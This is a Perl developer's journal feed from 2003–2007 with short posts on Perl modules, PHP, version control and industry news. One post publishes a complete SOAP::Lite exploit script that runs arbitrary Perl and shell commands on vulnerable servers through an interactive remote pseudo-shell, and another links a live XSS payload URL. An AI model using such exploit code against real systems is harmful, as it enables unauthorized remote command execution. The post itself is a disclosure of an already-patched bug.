IlyaM's Journal http://use.perl.org/~IlyaM/journal/ IlyaM's use Perl Journal en-us use Perl; is Copyright 1998-2006, Chris Nandor. Stories, comments, journals, and other submissions posted on use Perl; are Copyright their respective owners. 2012-01-25T02:09:03+00:00 pudge pudge@perl.org Technology hourly 1 1970-01-01T00:00+00:00 IlyaM's Journal http://use.perl.org/images/topics/useperl.gif http://use.perl.org/~IlyaM/journal/ New blog http://use.perl.org/~IlyaM/journal/33896?from=rss I decided to start blogging again. And I'm starting a fresh new blog at <a href="http://ilyamart.blogspot.com/">http://ilyamart.blogspot.com</a>. See you there. IlyaM 2007-07-27T14:59:02+00:00 journal jobs.perl.org http://use.perl.org/~IlyaM/journal/18331?from=rss <p>Just posted an <a href="http://jobs.perl.org/job/1402">ad</a> on <a href="http://jobs.perl.org/">jobs.perl.org</a>. Guess we'll be the first Russian company to use that site<nobr> <wbr></nobr>;)</p><p>Some complains though:</p><ul> <li>Why there is no preview?</li> <li>Why even employer cannot see his own ad until it is approved? It seems illogical especially since there is no preview.</li> <li>What does <i>Travel</i> field mean after all?</li> </ul> IlyaM 2004-04-14T10:58:08+00:00 journal Perl nightmares http://use.perl.org/~IlyaM/journal/17033?from=rss <a href="http://archives.real-time.com/pipermail/linux-kernel/2000-March/083405.html">PerlOS - the horrible, horrible dream</a> IlyaM 2004-01-27T10:31:30+00:00 journal ASCII art (for .sig?) http://use.perl.org/~IlyaM/journal/17016?from=rss <a href="http://www.network-science.de/ascii/">Link</a> of the day. IlyaM 2004-01-26T12:40:12+00:00 journal Experiences of Using PHP in Large Websites http://use.perl.org/~IlyaM/journal/16473?from=rss Quite good <a href="http://www.ukuug.org/events/linux2002/papers/html/php/index.html">article</a> which sums up pretty much all of my own complains about PHP: <ul> <li>PHP is so inconvinient to use with "separation of presentation from business logic" model. Still possible but what's the point if you can use something better (Perl + TT2<nobr> <wbr></nobr>:) if you want to develop using this model.</li> <li>PHP wasn't designed to be modular. No namespaces, everything is builtin, weak mechanisms for code reuse.</li> <li>Ugly builtin APIs. Arguable point probably but my feeling from day one I learned PHP is that its standart APIs badly lack elegance.</li> <li>php.ini as a portability nightmare.</li> </ul> IlyaM 2003-12-23T11:19:32+00:00 journal Yet another go addict http://use.perl.org/~IlyaM/journal/16096?from=rss <p>If you never played go do not click this <a href="http://senseis.xmp.net/?BeginnerStudySection">link</a>, you still can be saved from this drug<nobr> <wbr></nobr>:)</p><p>Just hacked this simple script to poll for my turns to move on <a href="http://www.dragongoserver.net/">http://www.dragongoserver.net/</a>. To my taste the script is a bit ugly but it works.</p><blockquote><div><p> <tt>#!/usr/bin/perl<br> <br>use strict;<br>use warnings;<br> <br>my $go = DragonGoServer-&gt;new;<br> <br>$go-&gt;login($ENV{DRAGONGO_LOGIN}, $ENV{DRAGONGO_PASSWORD});<br> <br>while(1) {<br>&nbsp; &nbsp; $go-&gt;read_status;<br>&nbsp; &nbsp; sleep 480;<br>}<br> <br>package DragonGoServer;<br> <br>use base qw(WWW::Mechanize);<br> <br>sub redirect_ok { 1 }<br> <br>sub login {<br>&nbsp; &nbsp; my $self = shift;<br>&nbsp; &nbsp; my ($login, $password) = @_;<br> <br>&nbsp; &nbsp; $self-&gt;get('http://www.dragongoserver.net/');<br>&nbsp; &nbsp; $self-&gt;submit_form(form_name =&gt; 'loginform',<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;fields&nbsp; &nbsp; =&gt; { userid =&gt; $login,<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; passwd =&gt; $password });<br>}<br> <br>sub read_status {<br>&nbsp; &nbsp; my $self = shift;<br> <br>&nbsp; &nbsp; $self-&gt;get('http://www.dragongoserver.net/status.php');<br> <br>&nbsp; &nbsp; if($self-&gt;content =~<nobr> <wbr></nobr>/Your turn to move in the following games/) {<br>&nbsp; &nbsp; &nbsp; &nbsp; print "Your turn to move in the following games:\n";<br> <br>&nbsp; &nbsp; &nbsp; &nbsp; my $re = qr!game\.php\?gid= (\d+)<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<nobr> <wbr></nobr>.*?<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; userinfo\.php\?uid=\d+<nobr> <wbr></nobr>.*? &lt;font.*?&gt; (.*?) &lt;/font&gt;<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;!x;<br> <br>&nbsp; &nbsp; &nbsp; &nbsp; my $content = $self-&gt;content;<br> <br>&nbsp; &nbsp; &nbsp; &nbsp; while($content =~<nobr> <wbr></nobr>/\G[\s\S]*?$re/g) {<br>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; print "Game #$1, player '$2'\n";<br>&nbsp; &nbsp; &nbsp; &nbsp; }<br> <br>&nbsp; &nbsp; &nbsp; &nbsp; print "\n"<br>&nbsp; &nbsp; }<br>}</tt></p></div> </blockquote> IlyaM 2003-12-01T15:30:18+00:00 journal Debian servers have been hacked http://use.perl.org/~IlyaM/journal/15921?from=rss Just recieved this email:<blockquote><div><p> <tt>From: Martin Schulze &lt;joey@infodrom.org&gt;<br>Subject: Some Debian Project machines have been compromised<br>To: Debian Announcements &lt;debian-announce@lists.debian.org&gt;<br>Date: Fri, 21 Nov 2003 11:46:19 +0100<br>Resent-From: debian-announce@lists.debian.org<br> <br>-------------------------------------------- ----------------------------<br>The Debian Project&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; http://www.debian.org/<br>Some Debian Project machines compromised&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; press@debian.org<br>November 21st, 2003<br>------------------------------------------------------------------------ <br> <br>Some Debian Project machines have been compromised<br> <br>This is a very unfortunate incident to report about.&nbsp; Some Debian<br>servers were found to have been compromised in the last 24 hours.<br> <br>The archive is not affected by this compromise!<br> <br>In particular the following machines have been affected:<br> <br>&nbsp; . master (Bug Tracking System)<br>&nbsp; . murphy (mailing lists)<br>&nbsp; . gluck (web, cvs)<br>&nbsp; . klecker (security, non-us, web search, www-master)</tt></p></div> </blockquote><p>Expect seeing it on slashdot soon. First Apache, then OpenSSH, then FSF, now Debian. Who is next? </p><p> <b>Update:</b> <a href="http://slashdot.org/article.pl?sid=03/11/21/1314238&amp;mode=thread&amp;tid=126&amp;tid=172&amp;tid=185&amp;tid=90">Story</a> on slashdot.</p> IlyaM 2003-11-21T12:07:55+00:00 journal Google Alert http://use.perl.org/~IlyaM/journal/15502?from=rss Interesting <a href="http://www.googlealert.com/">service</a>. IlyaM 2003-10-31T13:59:37+00:00 journal Another version controls systems comparison http://use.perl.org/~IlyaM/journal/15371?from=rss See <a href="http://better-scm.berlios.de/comparison/comparison.html">here</a>. IlyaM 2003-10-24T12:20:13+00:00 journal Every Language War Ever http://use.perl.org/~IlyaM/journal/15366?from=rss <a href="http://www.deftcode.com/archives/every_language_war_ever.html">Nice</a>. I especially liked this quote:<blockquote><div><p>There are two types of programming languages; the ones that people bitch about and the ones that no one uses.</p></div></blockquote><p> -- Bjarne Stroustrup</p> IlyaM 2003-10-24T07:48:06+00:00 journal open() and pipes quiz http://use.perl.org/~IlyaM/journal/15201?from=rss <p>What is the difference between these two lines (on Linux with Perl 5.8.x or 5.6.x). More precisely why does only first open die?</p><blockquote><div><p> <tt>open(FH, '/doesnt/exist&nbsp; 2&gt;&amp;1 |') or die "Cannot pipe: $!";<br> <br>open(FH, '/doesnt/exist\\&nbsp; 2&gt;&amp;1 |') or die "Cannot pipe: $!";</tt></p></div> </blockquote><p> <i>Hint</i> if you have no idea: try to remove 2&gt;&amp;1 from command line.</p> IlyaM 2003-10-14T12:09:30+00:00 journal PerlQuotes http://use.perl.org/~IlyaM/journal/15082?from=rss Link of the day: <a href="http://pq.tinita.de/">PerlQuotes</a>. It must be converted in fortune data file! <p> <b>Update:</b> I've got email from Tina Mueller and she told me that she have added <a href="http://pq.tinita.de/?what=fortune">fortune data file</a>. Cool!</p> IlyaM 2003-10-06T09:44:24+00:00 journal Opensource version control systems review http://use.perl.org/~IlyaM/journal/15036?from=rss Just found quite interesting <a href="http://seppuku.editthispage.com/2003/07/30">review</a> of different opensource version control systems. <p> As for me I'm trying to choose between Aegis and arch. I'm looking with very big suspect on subversion - my guts feeling is that subversion is too overengineered. Instead of solving real VC problems we see Apache intergration, WebDAV, binary db backend. At the end from the point of view of end user (i.e. me) it doesn't offer much more then old CVS. </p><p> P.S. And, yeah, BitKeeper rocks. But it is too expensive for <a href="http://www.iponweb.net/">us</a>.</p> IlyaM 2003-10-03T10:31:23+00:00 journal Overloaded abbrevs 2 http://use.perl.org/~IlyaM/journal/14877?from=rss Continuing <a href="http://use.perl.org/~IlyaM/journal/13251">my previous journal</a> entry about XP abbrev. <p> Just noticed that popular Russian <a href="http://www.xprogramming.ru/forum/">forum</a> on extreme programming has now a warning on its first page which literaly translates as <cite>If you will ask questions about Windows XP we will find and kill you!</cite><nobr> <wbr></nobr>:)</p> IlyaM 2003-09-24T08:01:39+00:00 journal Old SOAP::Lite exploit http://use.perl.org/~IlyaM/journal/14794?from=rss About year ago I <a href="http://use.perl.org/article.pl?sid=02/04/09/000212">announced</a> that I have wrote <a href="http://search.cpan.org/~kulchenko/SOAP-Lite/">SOAP::Lite</a> exploit. I didn't publish the exploit though I promised it. Interestingly enough nobody asked me for proof - so far only Paul Kulchenko (the SOAP::Lite author) and Randy J Ray have seen it. Well, in case it is still of somebody interest I'm publishing it here:<blockquote><div><p> <tt>#!/usr/bin/perl -w<br> <br># Copyright (c) 2002 by Ilya Martynov. All rights reserved.<br>#<br># This program is free software; you can redistribute it and/or modify<br># it under the same terms as Perl itself.<br> <br># This program exploits security bug in SOAP::Lite which allows any<br># SOAP client call any Perl subroutine as class/object method on side<br># of SOAP::Lite based SOAP server.<br>#<br># This vulnerability have been found by stealth &lt;stealth@segfault.net&gt;<br># and described in Phrack article 'RPC without borders':<br>#<br>#&nbsp; &nbsp; &nbsp;http://www.phrack.com/show.php?p=58&amp;a=9<br>#<br># This program shows how to<br>#<br># 1) evaluate any Perl code inside SOAP::Lite based server<br>#<br># 2) access remote pseudo shell<br>#<br># using this security bug.<br> <br>use strict;<br> <br>use SOAP::Lite;<br>use Term::ReadLine;<br> <br>my($uri, $proxy) = @ARGV;<br>unless(defined $proxy) {<br>&nbsp; &nbsp; die "Usage: $0 URI PROXY\n";<br>}<br> <br>my $soap = connect_soap($uri, $proxy);<br>shell($soap);<br> <br># returns soap object<br>sub connect_soap {<br>&nbsp; &nbsp; my $uri = shift;<br>&nbsp; &nbsp; my $proxy = shift;<br> <br>&nbsp; &nbsp; my $soap = SOAP::Lite<br>&nbsp; &nbsp; -&gt; uri($uri)<br>&nbsp; &nbsp; -&gt; proxy($proxy);<br> <br>&nbsp; &nbsp; return $soap;<br>}<br> <br># evals any Perl code on side of SOAP::Lite based server<br>sub remote_eval {<br>&nbsp; &nbsp; my $soap = shift;<br>&nbsp; &nbsp; my $expr = shift;<br> <br>&nbsp; &nbsp; # escape Perl expression<br>&nbsp; &nbsp; $expr = escape_single_quoted($expr);<br> <br>&nbsp; &nbsp; # code to run on side of SOAP::Lite server<br>&nbsp; &nbsp; my $code = &lt;&lt;CODE;<br>{<br>&nbsp; &nbsp; # make sure exploit works in tainted mode<br>&nbsp; &nbsp; local \%ENV = \%ENV;<br>&nbsp; &nbsp; (\$ENV{PATH}) = \$ENV{PATH} =~<nobr> <wbr></nobr>/(.*)/;<br>&nbsp; &nbsp; delete \@ENV{qw(IFS CDPATH ENV BASH_ENV)};<br> <br>&nbsp; &nbsp; # evaluate Perl code<br>&nbsp; &nbsp; my \$ret = eval '$expr';<br>&nbsp; &nbsp; # catch errors<br>&nbsp; &nbsp; if(\$\@) { \$ret = \$\@ }<br>&nbsp; &nbsp; # put result into array which will be returned to SOAP client<br>&nbsp; &nbsp; \$pointer-&gt;[0] = \$ret;<br>}<br>1<br>CODE<br> <br>&nbsp; &nbsp; my @params = ([], $code, '[1]');<br> <br>&nbsp; &nbsp; my $som = $soap-&gt;call('X:SOAP::SOM::_traverse' =&gt; @params);<br> <br>&nbsp; &nbsp; return $som-&gt;result-&gt;[0];<br>}<br> <br># simple pseudo shell which allows to execute commands on side of<br># SOAP::Lite based server<br>sub shell {<br>&nbsp; &nbsp; my $soap = shift;<br> <br>&nbsp; &nbsp; my $term = new Term::ReadLine 'SOAP::Lite remote shell';<br>&nbsp; &nbsp; my $OUT = $term-&gt;OUT || \*STDOUT;<br> <br>&nbsp; &nbsp; while (defined (my $cmd = $term-&gt;readline('&gt; ')) ) {<br>&nbsp; &nbsp; &nbsp; &nbsp; chomp $cmd;<br>&nbsp; &nbsp; &nbsp; &nbsp; my $cmd = escape_single_quoted($cmd);<br>&nbsp; &nbsp; &nbsp; &nbsp; print $OUT remote_eval($soap, "qx'$cmd'");<br>&nbsp; &nbsp; &nbsp; &nbsp; $term-&gt;addhistory($cmd) if $cmd =~<nobr> <wbr></nobr>/\S/;<br>&nbsp; &nbsp; }<br>}<br> <br># escapes string which is going to be used as single quoted string<br>sub escape_single_quoted {<br>&nbsp; &nbsp; my $string = shift;<br> <br>&nbsp; &nbsp; $string =~ s/(['\\])/\\$1/g;<br> <br>&nbsp; &nbsp; return $string;<br>}</tt></p></div> </blockquote><p>How does it work? Before 0.55 it was possible to call any subroutine in any Perl packages inside of SOAP::Lite based server (at least when autodispatch is turned on). Package X:SOAP::SOM used to contain (and actually still contains subroutine _traverse):</p><blockquote><div><p> <tt># source code of _traverse from 0.52<br>sub _traverse {<br>&nbsp; my $self = shift;<br>&nbsp; my($pointer, $itself, $path, @path) = @_;<br> <br>&nbsp; if ($path &amp;&amp; substr($path, 0, 1) eq '{') {<br>&nbsp; &nbsp; $path = join '/', $path, shift @path while @path &amp;&amp; $path !~<nobr> <wbr></nobr>/}/;<br>&nbsp; }<br> <br>&nbsp; my($op, $num) = $path =~<nobr> <wbr></nobr>/^\[(&lt;=|&lt;|&gt;=|&gt;|=|!=?)?(\d+)\]$/ if defined $path;<br> <br>&nbsp; return $pointer unless defined $path;<br> <br>&nbsp; $op = '==' unless $op; $op<nobr> <wbr></nobr>.= '=' if $op eq '=' || $op eq '!';<br>&nbsp; my $numok = defined $num &amp;&amp; eval "$itself $op $num";<br>&nbsp; my $nameok = (o_lname($pointer) || '') =~<nobr> <wbr></nobr>/(?:^|\})$path$/ if defined $path; # name can be with namespace<br> <br>&nbsp; my $anynode = $path eq '';<br>&nbsp; unless ($anynode) {<br>&nbsp; &nbsp; if (@path) {<br>&nbsp; &nbsp; &nbsp; return if defined $num &amp;&amp; !$numok || !defined $num &amp;&amp; !$nameok;<br>&nbsp; &nbsp; } else {<br>&nbsp; &nbsp; &nbsp; return $pointer if defined $num &amp;&amp; $numok || !defined $num &amp;&amp; $nameok;<br>&nbsp; &nbsp; &nbsp; return;<br>&nbsp; &nbsp; }<br>&nbsp; }<br> <br>&nbsp; my @walk;<br>&nbsp; push @walk, $self-&gt;_traverse_tree([$pointer], @path) if $anynode;<br>&nbsp; push @walk, $self-&gt;_traverse_tree(o_child($pointer), $anynode ? ($path, @path) : @path);<br>&nbsp; return @walk;<br>}</tt></p></div> </blockquote><p>As you can see one of code paths contains a call to eval. And since we can call this subroutine directly we can bypass whatever Perl code we want to this eval. The only thing required from the exploit to work is to supply correct arguments for this subroutine to enable the code path with eval. </p><p> I hope all of you upgraded to 0.55 - after all this release which fixes the security hole exploited by this exploit was released one year ago.</p> IlyaM 2003-09-19T19:54:56+00:00 activestate I'm 25 since today http://use.perl.org/~IlyaM/journal/14786?from=rss My wife gave me the coolest present for my birthday - an expresso machine. Natasha, if you are reading this, thank you again<nobr> <wbr></nobr>:) <p> <b>Update</b>: Fix s/made present/gave present/. Thanks to <a href="http://use.perl.org/~jdavidboyd">jdavidboyd</a> and <a href="http://use.perl.org/~phillup">phillup</a> for free English lesson<nobr> <wbr></nobr>:)</p> IlyaM 2003-09-19T14:26:23+00:00 journal New release of Mail::CheckUser (thanks to Verisign) http://use.perl.org/~IlyaM/journal/14780?from=rss Those idiots from Verisign are <a href="http://slashdot.org/article.pl?sid=03/09/16/0034210">breaking internet</a> and this breakage affected <a href="http://search.cpan.org/author/ILYAM/Mail-CheckUser/">Mail::CheckUser</a>. Rob Brown patched Mail::CheckUser to stop accepting bogus domains and I've just uploaded a new version (1.21) on CPAN. <p> If you use or develop any software affected by Verisign "innovations" you may find this <a href="http://www.imperialviolet.org/dnsfix.html">page</a> interesting. </p><p> In other news Verisign was <a href="http://slashdot.org/article.pl?sid=03/09/19/039214">sued</a> over new VeriSign's "services". I hope Verisign will burn in hell. </p><p> <b>Update:</b> Those Verisign monkeys cannot even write simple search page without <a href="http://www.google.com/search?q=XSS">XSS</a> bugs. See <a href="http://sitefinder.verisign.com/lpc?url='%2F%2F--%3E%3C%2Fscript%3E%22%2F%2F--%3E%3C%2Fscript%3E%3E%3Cfont%20size%3D%22%2B3%22%3E%3Cb%3EIf%20%3Cem%3Eshe%3C%2Fem%3E%20loves%20us%20then%20we%20%3Cem%3Ehave%3C%2Fem%3E%20to%20be%20cool!%3Cbr%3E%3Cimg%20src%3D%22http%3A%2F%2Fwww.patrick.fm%2Fboobies%2Fboobies.php%3Ftext%3DVeriSign%22%3E%3Cbr%3EVeriSign!%20Hot%20babes%20love%20us!%20You%20should%20too!%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3C%2Ffont%3E%0A">here</a> (warning - explicit content). I've made a <a href="http://martynov.org/img/verisign.png">screenshot</a> in case they fix it. Thanks to Pan T. Hose from slashdot for <a href="http://slashdot.org/comments.pl?sid=79138&amp;cid=7001260">spoting</a> it.</p> IlyaM 2003-09-19T08:00:02+00:00 journal New unpublished ssh exploit? http://use.perl.org/~IlyaM/journal/14728?from=rss If <a href="http://docs.freebsd.org/cgi/getmsg.cgi?fetch=2498+0+current/freebsd-security">this</a> is true it is quite scary. IlyaM 2003-09-16T09:13:19+00:00 journal I'm fed up with SourceForge http://use.perl.org/~IlyaM/journal/14649?from=rss <ul> <li>Mailling list archives are being broken too often</li> <li>Mailling list archives do not show attachments</li> <li>Web interface to CVS and anonymous access to CVS has up to 24 hours lag</li> </ul><p> Yes, it is a free service and if I don't like it I can pack my things and go somewhere else. Well, probably I will do exactly this.</p> IlyaM 2003-09-11T08:53:25+00:00 journal Copyright on blank lines http://use.perl.org/~IlyaM/journal/14647?from=rss LOL, <a href="http://yro.slashdot.org/comments.pl?sid=77932&amp;cid=6925797">this</a> is really funny. IlyaM 2003-09-11T07:50:09+00:00 journal Scary moment .. http://use.perl.org/~IlyaM/journal/14571?from=rss .. is when you realize that you have forgot a password for your GPG private key which you have been using quite actively for 3 years. Memory plays dirty tricks sometimes - I was able to recall this password 15 mins later. IlyaM 2003-09-08T09:11:06+00:00 journal META.yml, Module::Build and dh-make-perl http://use.perl.org/~IlyaM/journal/14564?from=rss Posting here just to keep this knowledge somewhere. To make <a href="http://packages.debian.org/stable/devel/dh-make-perl.html">dh-make-perl</a> work with <a href="http://search.cpan.org/dist/Module-Build/">Module::Build</a> based Perl module distros you need: <ul> <li>Apply <a href="http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=209059">this patch</a> to enable dh-make-perl to retrieve module name and version information from META.yml.</li> <li>After running dh-make-perl tweak file debian/rules. Replace<blockquote><div><p> <tt>$(PERL) Makefile.PL INSTALLDIRS=vendor<br>$(MAKE) OPTIMIZE="$(OPTIMIZE)" LD_RUN_PATH=""</tt></p></div> </blockquote><p>with</p><blockquote><div><p> <tt>$(PERL) Build.PL installdirs=vendor<br>OPTIMIZE="$(OPTIMIZE)" LD_RUN_PATH=""<nobr> <wbr></nobr>./Build</tt></p></div> </blockquote><p>and</p><blockquote><div><p> <tt>$(MAKE) install PREFIX=$(TMP)/usr</tt></p></div> </blockquote><p>with</p><blockquote><div><p><nobr> <wbr></nobr><tt>./Build install destdir=$(TMP)</tt></p></div> </blockquote></li> </ul><p> I'd add native Module::Build support to dh-make-perl but this code badly needs refactoring before adding more code.</p> IlyaM 2003-09-07T17:47:57+00:00 journal RT/Jabber integration http://use.perl.org/~IlyaM/journal/14484?from=rss Just got this idea - it would be quite neat if RT ticket watchers could recieve reply/comment notifications via Jabber (or via other IMs probably though it is less interesting for me as we standardize on Jabber at work). IlyaM 2003-09-04T08:44:19+00:00 journal False Security http://use.perl.org/~IlyaM/journal/14387?from=rss What I don't get is why many ISPs don't allow ssh access to their boxes while at same time they allow you to run your own cgi scripts. If you can run arbitrary CGI then you can run arbitrary code on the server even without shell. <p> On similar note why SourceForge disallow SSH access to their CVS servers when they allow you to modify files in CVSROOT? If I can add commit and loginfo scripts there I can run arbitrary code on the server too. </p><p> For sysamins: better not waste your time on false security measures especially when it makes life of legimate users harder.</p> IlyaM 2003-08-29T13:01:16+00:00 journal ExtUtils::MakeMaker and CGI::Carp http://use.perl.org/~IlyaM/journal/13968?from=rss Today when installing a module on a test server I've been surprised when 'perl Makefile.PL' printed something like:<blockquote><div><p> <tt>$ perl5.6.1 Makefile.PL<br>[Thu Aug&nbsp; 7 15:09:35 2003] Makefile.PL: Warning: prerequisite Email::Valid failed to load: Can't locate Email/Valid.pm in @INC (@INC contains:<nobr> <wbr></nobr>/home/perl-5.6.1/lib/5.6.1/i686-linux<nobr> <wbr></nobr>/home/perl-5.6.1/lib/5.6.1<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl/5.6.1/i686-linux<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl/5.6.1<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl<nobr> <wbr></nobr>.) at (eval 5) line 3.<br>[Thu Aug&nbsp; 7 15:09:35 2003] Makefile.PL: Warning: prerequisite MIME::Lite failed to load: Can't locate MIME/Lite.pm in @INC (@INC contains:<nobr> <wbr></nobr>/home/perl-5.6.1/lib/5.6.1/i686-linux<nobr> <wbr></nobr>/home/perl-5.6.1/lib/5.6.1<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl/5.6.1/i686-linux<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl/5.6.1<nobr> <wbr></nobr>/home/perl-5.6.1/lib/site_perl<nobr> <wbr></nobr>.) at (eval 6) line 3.<br>Writing Makefile for FillForm</tt></p></div> </blockquote><p>Turned out it is because CGI::Carp was listed in PREREQ_PM section.</p> IlyaM 2003-08-07T14:14:57+00:00 journal while() { ... } considered harmful continued ... http://use.perl.org/~IlyaM/journal/13897?from=rss For background see this perlmonks <a href="http://www.perlmonks.com/index.pl?node_id=195926">node</a>. <p> Seeing a recent patch at bug report <a href="http://bugs6.perl.org/rt2/Ticket/Display.html?id=23141">#23141</a> makes me wonder if doing <code>local $_; while() {<nobr> <wbr></nobr>... }</code> will stop working too in general case. In other words if I get things correctly with this patch no CPAN module can use $_ even if it is localized because $_ may be readonly or have some magic attached to it and local will not remove it. Looks like using <code>local</code> with global variables is almost always bad idea unless callee can allow certain assuptions about callers (what is seldom a case for, say, CPAN modules).</p> IlyaM 2003-08-04T16:58:30+00:00 journal Another developer release of Data::Dumper http://use.perl.org/~IlyaM/journal/13825?from=rss <blockquote><div><p> <tt>The URL<br> <br>&nbsp; &nbsp; http://martynov.org/tgz/Data-Dumper-2.12_02.tar.gz<br> <br>has entered CPAN as<br> <br>&nbsp; file: $CPAN/authors/id/I/IL/ILYAM/Data-Dumper-2.12_02.tar.gz<br>&nbsp; size: 37466 bytes<br>&nbsp; &nbsp;md5: 5bf08437a88003604a95cc08418d6b57</tt></p></div> </blockquote><p>This release fixes build errors on 5.6.x with ithreads. Thanks to crazyinsomniac for the bug report. Hopefully there will be no other bug reports and I'll be able to rerelease 2.12_02 as a stable version 2.121.</p> IlyaM 2003-07-31T19:46:11+00:00 journal I promise ... http://use.perl.org/~IlyaM/journal/13814?from=rss I will not hurry and I will not press 'submit' before I correct all typos and other errors in my posts. What a shame to see all these errors when they would not exist in first place if I were to spend 2 mins more on each my post. IlyaM 2003-07-31T16:56:58+00:00 journal HTML::Mason with HTML::Template http://use.perl.org/~IlyaM/journal/13802?from=rss <a href="http://search.cpan.org/author/EBRUNI/MasonX-Request-HTMLTemplate/">MasonX::Request::HTMLTemplate</a> have been released on CPAN and<nobr> <wbr></nobr>.. I fail to see the point.<p> I can understand why somebody may want to use Perl as a templating language - if you are in this camp you may like HTML::Mason (I used to like it but I switched to TT2 now). But using HTML::Mason as a framework to maintain Perl code for anything other than templating tasks is just nonsence. I just don't undestand why. Code in Mason components is harder to unit test than Perl modules, it takes more effort to structure your code - in ordinary Perl you have packages and subroutines, in Mason you can emulate something like this with components and subcomponents but it takes more effort and finally Mason has quite confusing OOP model which may be ok for templates but is not really up to task for anything complex. How can it be easier to put your Perl code in Mason components instead of Perl modules?</p> IlyaM 2003-07-31T09:08:25+00:00 journal PHP annoyance http://use.perl.org/~IlyaM/journal/13686?from=rss One reason I extreamly dislike PHP is that they have no analog of CPAN which results in a lot of staff being put in core. Which in turn results being practically imposible to develop backwards compatible code. I.e. if you say develop with 4.2.x, then in each core lib you use there are zillion new features which are not present in former versions. And you occasionally use new features even if you want to stay backward compatible just because there are so many of them. <p> With perl it's core is much smaller and many core libs have standalone versions avialable from CPAN which still work with old perls. Basically I can keep in my head list of all things I should I avoid if I want to be backward compatible even back to 5.00503. Try this with PHP.</p> IlyaM 2003-07-25T10:43:00+00:00 journal